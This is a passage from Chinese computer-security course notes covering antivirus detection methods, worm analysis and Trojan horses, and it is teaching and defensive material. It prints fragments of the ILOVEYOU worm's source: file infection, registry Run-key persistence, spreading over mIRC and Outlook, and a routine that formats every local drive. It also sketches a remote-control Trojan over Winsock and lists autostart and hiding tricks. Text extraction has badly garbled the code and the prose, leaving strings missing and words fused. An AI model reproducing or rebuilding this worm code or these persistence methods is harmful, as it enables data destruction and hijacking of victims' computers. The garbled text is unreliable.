36、0) thenregcreate HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersio nRunWIN-BUGSFIX,downread&WIN-BUGSFIX.exe regcreate HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain Start Page,about:blank end if該病毒感染文件部分源代碼如下：On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 set f = fso.Ge

37、tFolder(folderspec) set fc = for each f1 in fc ext=fso.GetExtensionName(f1.path) ext=lcase(ext) s=lcase() if (ext=vbs) or (ext=vbe) then set ap=fso.OpenTextFile(f1.path,2,true) vbscopy elseif(ext=js)or(ext=jse)or(ext=css)or(ext=wsh)or(ext=sct)or(ext=hta) then set ap=fso.OpenTextFile(f1.path,2,true)

38、vbscopy bname=fso.GetBaseName(f1.path) set cop=fso.GetFile(f1.path) cop.copy(folderspec&bname&.vbs) fso.DeleteFile(f1.path) elseif(ext=jpg) or (ext=jpeg) then set ap=fso.OpenTextFile(f1.path,2,true) vbscopy set cop=fso.GetFile(f1.path) cop.copy(f1.path&.vbs) fso.DeleteFile(f1.path) elseif(ext=mp3) o

39、r (ext=mp2) then set mp3=fso.CreateTextFile(f1.path&.vbs) mp3.write vbscopy mp3.close set att=fso.GetFile(f1.path) =att.attributes+2 end if if (eqfolderspec) then if (s=mirc32.exe) or (s=mlink32.exe) or (s=) or (s=) or (s=) then set scriptini=) script ;mIRC Script ; Please dont edit this script. mIR

40、C will corru pt, if mIRC will corrupt. WINDOWS will affect and will not run correctly. thanks ; ;Khaled Mardam-Bey ; :/ ; n0=on 1:JOIN:#: n1= /if ( $nick = $me ) halt n2= /.dcc send $nick &dirsystem&LOVE-LETTER-FO R-YOU.HTM n3= eq=folderspec end if end if 4.3 計(jì)算機(jī)殺毒軟件制作技術(shù) 1特征代碼法 從病毒程序中抽取一段獨(dú)一無(wú)二、足以代表該病

41、毒特征的二進(jìn)制程序代碼，并將這段代碼作為判斷該病毒的依據(jù)，這就是所謂的病毒特征代碼。 從各種病毒樣本中抽取特征代碼，就構(gòu)成了病毒資料庫(kù)。 顯然，病毒資料庫(kù)中病毒特征代碼種類越多，殺毒軟件能查出的病毒就越多。 選擇病毒特征碼要能夠反映出該病毒典型特征，如它的破壞、傳播和隱藏性代碼。由于病毒數(shù)據(jù)區(qū)會(huì)經(jīng)常變化，因此病毒特征代碼不要含有病毒的數(shù)據(jù)區(qū)。在保持病毒典型特征唯一性的前提下，抽取的病毒特征代碼要長(zhǎng)度適當(dāng)，應(yīng)盡量使特征代碼長(zhǎng)度短些，以減少空間與時(shí)間開(kāi)銷，使誤報(bào)警率最低。 在檢查文件是否含有病毒時(shí)，可以先打開(kāi)被檢測(cè)文件，在文件中搜索，檢查文件中是否含有與病毒數(shù)據(jù)庫(kù)中相同的病毒特征代碼。 如果發(fā)現(xiàn)文

42、件中含有病毒特征代碼，便可以斷定被查文件中患有何種病毒。 采用病毒特征代碼法的檢測(cè)工具，必須不斷更新病毒資料庫(kù)，否則檢測(cè)工具便會(huì)過(guò)期老化，逐漸失去實(shí)用價(jià)值。 特征代碼法的優(yōu)點(diǎn)是檢測(cè)準(zhǔn)確、快速、可識(shí)別病毒的名稱，是檢測(cè)已知病毒的最簡(jiǎn)單、開(kāi)銷最小的方法。缺點(diǎn)是不能檢測(cè)未知病毒、變種病毒和隱蔽性病毒（隱蔽性病毒進(jìn)駐內(nèi)存后，會(huì)自動(dòng)剝?nèi)ト径境绦蛑械牟《敬a），需定期更新病毒資料庫(kù)，具有滯后性。 2校驗(yàn)和法 校驗(yàn)和法是根據(jù)文件的內(nèi)容，計(jì)算其校驗(yàn)和，并將所有文件的校驗(yàn)和放在資料庫(kù)中。檢測(cè)時(shí)將文件現(xiàn)有內(nèi)容的校驗(yàn)和與資料庫(kù)中的校驗(yàn)和做比較，若不同則判斷為被感染病毒。運(yùn)用校驗(yàn)和法查病毒可以采用三種方式： （1）在

43、檢測(cè)病毒工具中加入校驗(yàn)和法。 （2）在應(yīng)用程序中加入校驗(yàn)和法自我檢查功能。 （3）將校驗(yàn)和檢查程序常駐內(nèi)存。 3行為監(jiān)測(cè)法 行為監(jiān)測(cè)法是將病毒中比較特殊的共同行為歸納起來(lái)，例如，對(duì)文件做寫(xiě)入動(dòng)作，格式化硬盤動(dòng)作、修改網(wǎng)頁(yè)等。當(dāng)程序運(yùn)行時(shí)監(jiān)視其行為，若發(fā)現(xiàn)類似病毒的行為，立即報(bào)警。 4 虛擬機(jī)技術(shù) (軟件模擬法) 用程序代碼虛擬一個(gè)CPU、各個(gè)寄存器、硬件端口也虛擬出來(lái)，調(diào)入被調(diào)的“樣本”，通過(guò)內(nèi)存和寄存器以及端口的變化來(lái)了解程序的執(zhí)行情況。將病毒放到虛擬機(jī)中執(zhí)行，則病毒的傳染和破壞等動(dòng)作一定會(huì)被反映出來(lái)。 5主動(dòng)內(nèi)核技術(shù) 是主動(dòng)給操作系統(tǒng)和網(wǎng)絡(luò)系統(tǒng)打了“補(bǔ)丁”，這些補(bǔ)丁將從安全的角度對(duì)系統(tǒng)或網(wǎng)

44、絡(luò)進(jìn)行管理和檢查，對(duì)系統(tǒng)的漏洞進(jìn)行修補(bǔ)，任何文件在進(jìn)入系統(tǒng)之前，反病毒模塊都將首先使用各種手段對(duì)文件進(jìn)行檢測(cè)處理。 6啟發(fā)掃描的反病毒技術(shù) 是以特定方式實(shí)現(xiàn)對(duì)有關(guān)指令序列的反編譯，逐步理解和確定其蘊(yùn)藏的真正動(dòng)機(jī)。例如，一段程序有：MOV AH , 5和 INT 13h，這段指令之前不存在取得命令行關(guān)于執(zhí)行的參數(shù)選項(xiàng)等，可以認(rèn)為這是一個(gè)病毒或惡意破壞的程序。 7實(shí)時(shí)反病毒技術(shù) 實(shí)時(shí)反病毒是對(duì)任何程序在調(diào)用之前都被先過(guò)濾一遍，一有病毒侵入，它就報(bào)警，并自動(dòng)殺毒，將病毒拒之門外，做到防患于未然。 8郵件病毒防殺技術(shù) 采用智能郵件客戶端代理SMCP技術(shù)，該技術(shù)具有完善的郵件解碼技術(shù)，能對(duì)郵件的各個(gè)部分

45、，進(jìn)行病毒掃描；清除病毒后能將無(wú)毒的郵件數(shù)據(jù)重新編碼，傳送給郵件客戶端，并且能夠更改主題、添加查毒報(bào)告附件，具備垃圾郵件處理功能等。 還有比較法、感染實(shí)驗(yàn)法等。 4.4 蠕蟲(chóng)病毒分析 蠕蟲(chóng)病毒是目前對(duì)計(jì)算機(jī)威脅最大的網(wǎng)絡(luò)病毒，蠕蟲(chóng)病毒的特征： 1蠕蟲(chóng)病毒的自我復(fù)制能力 可以用VB腳本語(yǔ)言編寫(xiě)實(shí)現(xiàn)自我復(fù)制程序。 Set objFs=CreateObject（“”） 創(chuàng)建一個(gè)文件系統(tǒng)對(duì)象 Set ff= （“”，1） 通過(guò)文件系統(tǒng)對(duì)象的方法創(chuàng)建了一個(gè)TXT文件。 或 （“C:” ）（沒(méi)有，1） 如果把這兩句話保存成為.vbs的VB腳本文件，點(diǎn)擊鼠標(biāo)就會(huì)在C盤中創(chuàng)建一個(gè)TXT文件了。如果把第二句改為

46、： （）.Copy （“C：”） 就可實(shí)現(xiàn)將自身復(fù)制到C盤這個(gè)文件上。 2蠕蟲(chóng)病毒的傳播性 其VB腳本代碼如下： SetobjOA=（“”）創(chuàng)建一個(gè)OUTLOOK應(yīng)用的對(duì)象 SetobjMapi= （“MAPI”） 取得MAPI名字空間 For i=1 to 遍歷地址簿 Set objAddList= （i） For j=1 To objAddList. Set objMail= （0） （objAddList. AddressEntries （j） 取得收件人郵件地址 =“你好!” 設(shè)置郵件主題 =“這次給你的附件，是我的新文檔！” 設(shè)置信件內(nèi)容 （“”） 把自己作為附件擴(kuò)散出去 發(fā)送郵件

47、Next Next Set objMapi=Nothing 清空objMapi變量，釋放資源 Set objOA=Nothing 清空objOA變量 3蠕蟲(chóng)病毒的潛伏性 以下是愛(ài)蟲(chóng)病毒中的部分代碼： On Error Resume Next 容錯(cuò)語(yǔ)句，避免程序崩潰 dim wscr,rr set wscr=CreateObject （） 擊活 對(duì)象 rr=HKEY_CURRENT_USERSoftwareMicrosoftWindowscripting HostSettingsTimeout） 讀入注冊(cè)表中的超時(shí)鍵值if （rr=1） then 超時(shí)設(shè)置“HKEY_CURRENT_USERSo

48、ftwareMicrosoftWindowsScripting HostSettingsTimeout”,0,“REG_DWORD”end if 下面的一段代碼則是修改注冊(cè)表，使得每次系統(tǒng)啟動(dòng)時(shí)自動(dòng)執(zhí)行腳本文件。其中和是病毒腳本的一個(gè)副本。 regcreate“HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunMSKernel32“,dirsystem&”regcreate “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServicesWin32DLL,

49、“dirwin&”Win32DLL.vbs”4蠕蟲(chóng)病毒的觸發(fā)性 x=time（） if x= then end if5蠕蟲(chóng)病毒的破壞性 sub killc （） 破壞硬盤的過(guò)程O(píng)n Error Resume Next 容錯(cuò)語(yǔ)句，避免程序崩潰dim fs,auto,disc,ds,ss,i,x,dirSetfs=CreateObject(“”)Set auto = （“”, True） 建立或修改自動(dòng)批處理 （“echo off”） 屏蔽掉刪除的進(jìn)程 （“Smartdrv”）加載磁盤緩沖 Set disc = 得到磁盤驅(qū)動(dòng)器的集合For Each ds in discIf = 2 Then 如果

50、磁盤驅(qū)動(dòng)器是本地盤ss = ss & 就將符號(hào)連在一起End IfNextss=LCase （StrReverse （Trim （ss） 得到符號(hào)串的反向小寫(xiě)形式For i=1 to Len （ss） 遍歷每個(gè)磁盤驅(qū)動(dòng)器x=Mid （ss,i,1） 讀每個(gè)磁盤驅(qū)動(dòng)器的符號(hào) （“format/autotest/q/u “&x&”:”） 反向 （從Z：到A：）自動(dòng)格式化磁盤驅(qū)動(dòng)器next 關(guān)閉批處理文件set dir= （“”）dir.attributes=dir.attributes+2 將自動(dòng)批處理文件改為隱藏 4.5 特洛伊木馬4.5.1 黑客程序與特洛伊木馬 特洛伊木馬實(shí)際上是一種典型的黑

51、客程序，它是一種基于遠(yuǎn)程控制的黑客工具，現(xiàn)在已成為黑客程序的代名詞。將黑客程序形容為特洛伊木馬就是要體現(xiàn)黑客程序的隱蔽性和欺騙性。 比較著名的木馬程序有BackOrifice（BO）、Netspy（網(wǎng)絡(luò)精靈）、Glacier（冰河）等，這些木馬程序大多可以在網(wǎng)上下載下來(lái)直接使用。4.5.2 木馬的基本原理 木馬本質(zhì)上只是一個(gè)網(wǎng)絡(luò)客戶/服務(wù)程序（Client/Server），一般有兩個(gè)部分組成：一個(gè)是服務(wù)端程序，另一個(gè)是客戶端程序。以冰河程序?yàn)槔?，在VB中，可以使用WinSock控件來(lái)編寫(xiě)網(wǎng)絡(luò)客戶服務(wù)程序，實(shí)現(xiàn)方法如下：服務(wù)端： G_ =7626（冰河的默認(rèn)端口，可以改為別的值） （等待連接）客

52、戶端： G_ =ServerIP（設(shè)遠(yuǎn)端地址為服務(wù)器地址） G _=7626（設(shè)遠(yuǎn)程端口為冰河的默認(rèn)端口） （調(diào)用Winsock控件的連接方法） 其中，G_Server和G_Client均為Winsock控件。一旦服務(wù)端接到客戶端的連接請(qǐng)求Connection Request，就接受連接。 Private Sub G_ server connection Request G_ Server.Accept reauestID End Sub 客戶機(jī)端用發(fā)送命令，而服務(wù)器在G_Server DateArrive事件中接受并執(zhí)行命令（幾乎所有的木馬功能都在這個(gè)事件處理程序中實(shí)現(xiàn)）。如果客戶斷開(kāi)連接，

53、則關(guān)閉連接并重新監(jiān)聽(tīng)端口。 Private Sub G _Server Close（） （關(guān)閉連接） （再次監(jiān)聽(tīng)） End Sub 4.5.3 特洛伊木馬的啟動(dòng)方式 首先黑客將木馬程序捆綁在一些常用的軟件上，甚至在你瀏覽網(wǎng)頁(yè)的時(shí)候，將木馬悄悄安裝到你的計(jì)算機(jī)中。 將一個(gè)程序捆綁到另一個(gè)程序可以通過(guò)自己編寫(xiě)程序來(lái)實(shí)現(xiàn)，也可以從網(wǎng)上下載類似DAMS文件捆綁器來(lái)實(shí)現(xiàn)。 在Windows系統(tǒng)中，黑客實(shí)現(xiàn)程序自啟動(dòng)的方法很多，常見(jiàn)的方法有： 1修改系統(tǒng)配置文件 通過(guò)修改系統(tǒng)配置文件、來(lái)實(shí)現(xiàn)木馬的自啟動(dòng)。 有兩個(gè)數(shù)據(jù)項(xiàng)“l(fā)oad = ”和“run = ”，如果木馬需要在系統(tǒng)啟動(dòng)后運(yùn)行一個(gè)程序，只要在“l(fā)o

54、ad = ”和“run = ”后添加該程序的程序名就可以了。 2修改注冊(cè)表 修改注冊(cè)表是木馬最常用的攻擊和入侵手段，在注冊(cè)表中有一名稱為： HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrent VersionRun*的鍵。 如果想讓程序在系統(tǒng)啟動(dòng)的過(guò)程中啟動(dòng)該程序，就可以向該目錄添加一個(gè)子項(xiàng)。 黑客比較喜歡在帶“Once”的主鍵中作手腳，因?yàn)閹А癘nce”的主鍵中的鍵值在程序運(yùn)行后將被刪除。這樣，當(dāng)用戶使用注冊(cè)表修改程序查看時(shí)不會(huì)發(fā)現(xiàn)。 3通過(guò)文件關(guān)聯(lián)啟動(dòng) 例如，通過(guò).exe文件關(guān)聯(lián)exefile，將注冊(cè)表中HKEY CLASSES ROOTexe

55、file下的shellopencommand的默認(rèn)“%1”%*”改成“x: xxxbsy.exe”（木馬程序的路徑），讓系統(tǒng)在執(zhí)行.exe程序時(shí)就自動(dòng)運(yùn)行木馬程序。通常修改的還有.txt文件關(guān)聯(lián)txtfile，只要讀取.txt文本文件就執(zhí)行木馬程序等。 4利用文件自動(dòng)運(yùn)行功能 例如在E盤根目錄下新建一個(gè)文件，用記事本打開(kāi)它，輸入如下內(nèi)容： autorun 保存后重新啟動(dòng)，進(jìn)入“我的電腦”，然后雙擊E盤盤符，記事本被打開(kāi)了，而E盤卻沒(méi)有打開(kāi)。 5利用對(duì)動(dòng)態(tài)連接庫(kù)（DLL）的調(diào)用 黑客可以將木馬程序捆綁到DLL上（如），當(dāng)用戶使用API函數(shù)時(shí)，黑客就會(huì)先啟動(dòng)木馬程序，然后再調(diào)用真正的函數(shù)完成API

56、函數(shù)功能。 4.5.4 特洛伊木馬端口 黑客所使用的客戶端程序就可以進(jìn)入木馬打開(kāi)的端口和木馬進(jìn)行通信。 每種木馬所打開(kāi)的端口不同，根據(jù)端口號(hào)可以識(shí)別不同的木馬。 大多數(shù)木馬使用的端口號(hào)在1024以上。4.5.5 特洛伊木馬的隱藏 木馬為了更好地隱藏自己，通常會(huì)將自己的位置放在c:windows和c:windowssystem32等系統(tǒng)目錄中。 木馬的服務(wù)程序命名也很狡猾，通常使用和系統(tǒng)文件相似的文件名。 如果黑客把木馬程序取名為“ .exe”，其中是中文的全角空格，我們看到木馬程序?qū)⑹且粋€(gè)無(wú)文件名的文件。 有的木馬具有很強(qiáng)的潛伏能力，表面上的木馬程序被發(fā)現(xiàn)并被刪除后，后備的木馬在一定的條件下會(huì)

57、恢復(fù)被刪除的木馬。 4.5.6 特洛伊木馬分類 1主動(dòng)型木馬 主動(dòng)型木馬原理圖 2反彈型木馬 反彈型木馬原理圖 黑客將安放在內(nèi)部網(wǎng)絡(luò)的反彈木馬定時(shí)地連接外部攻擊的主機(jī)，由于連接是從內(nèi)部發(fā)起的，防火墻無(wú)法區(qū)分是木馬的連接還是合法的連接。 3嵌入式木馬 嵌入式木馬是黑客將木馬程序嵌入到己知的網(wǎng)絡(luò)通信程序中（如IE瀏覽器、操作系統(tǒng)等），利用己知的網(wǎng)絡(luò)通信程序來(lái)轉(zhuǎn)發(fā)木馬控制指令，躲過(guò)防火墻檢測(cè)。4.5.7 特洛伊木馬查殺 木馬的查殺可以采用自動(dòng)和手動(dòng)兩種方式。最簡(jiǎn)單的刪除木馬方法是安裝殺毒軟件或一些專殺木馬的軟件。 由于殺毒軟件的升級(jí)要慢于木馬的出現(xiàn)，因此學(xué)會(huì)手工查殺也是非常必要。 在手工刪除木馬之前

58、，最重要的一項(xiàng)工作是備份注冊(cè)表，防止系統(tǒng)崩潰，備份你認(rèn)為是木馬的文件。如果不是木馬就可以恢復(fù)，如果是木馬就可以對(duì)木馬進(jìn)行分析。 1查看注冊(cè)表 在HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion和HKEY_CURRENT_USERSoftware MicrosoftWindowsCurrentVersion下所有以“Run”開(kāi)頭的鍵值名有沒(méi)有可疑的文件名。 2檢查啟動(dòng)組 啟動(dòng)組對(duì)應(yīng)的文件夾為：C:windowsstart menuprogramsstartup，要經(jīng)常檢查啟動(dòng)組中是否有異常的文件。 3檢查系統(tǒng)配置文件 檢查、等系統(tǒng)配置文件。現(xiàn)在修改中Shell值的情況要多一些，如果在中看到：時(shí)，這個(gè)有可能就是木馬程序。 4查看端口與進(jìn)程 使用Windows本身自帶的netstat -an命令就能查看到與本機(jī)建立連接的IP以及本機(jī)偵聽(tīng)的端口。也可以使用Active Ports工具監(jiān)視計(jì)算機(jī)所有打開(kāi)的TCP/IP